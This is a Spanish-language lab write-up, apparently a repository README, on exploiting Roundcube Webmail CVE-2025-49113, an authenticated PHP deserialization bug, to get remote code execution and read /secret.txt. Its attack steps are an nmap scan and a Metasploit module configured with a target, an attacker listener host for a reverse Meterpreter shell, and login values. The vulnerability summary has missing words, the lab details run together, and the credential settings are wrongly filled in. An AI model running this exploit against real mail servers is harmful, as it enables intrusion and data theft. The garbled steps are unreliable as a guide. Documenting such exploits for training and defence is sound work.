Laboratorio práctico de explotación para Roundcube Webmail CVE-2025-49113 (deserialización de objetos PHP autenticada → RCE) para leer /secret.txt.
DESCARGO DE RESPONSABILIDAD: Solo para uso educativo
Este repositorio documenta mi explotación paso a paso de Roundcube Webmail CVE-2025-49113 en un laboratorio controlado para obtener el secreto almacenado en /secret.txt.
⚠️ Descargo de responsabilidad
Todo el trabajo se realizó contra un entorno de laboratorio/formación que estoy autorizado a probar.
No utilice estas técnicas contra sistemas que no posea o administre.
Roundcube Webmail es un cliente de correo electrónico PHP de código abierto basado en navegador que se conecta a buzones de correo a través de IMAP y envía correo a través de SMTP. Comúnmente se ejecuta en Apache o Nginx con MySQL/PostgreSQL/SQLite y se usa ampliamente en entornos de hosting compartido.
Vulnerabilidad – CVE-2025-49113
Todas las versiones de Roundcube hasta 1.6.10 inclusive (y 1.5.x anteriores a 1.5.10) contienen un error crítico en program/actions/settings/upload.php. El parámetro no se valida correctamente, lo que permite a un atacante autenticado desencadenar una y lograr la con privilegios del servidor web.
_fromCredenciales del laboratorio:
roundcubercpassObjetivo:
¿Cuál es el secreto dentro del archivo
/secret.txt?
nmapmsfconsole (Metasploit 6)172.20.2.57exploit/multi/http/roundcube_auth_rce_cve_2025_49113Comando: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt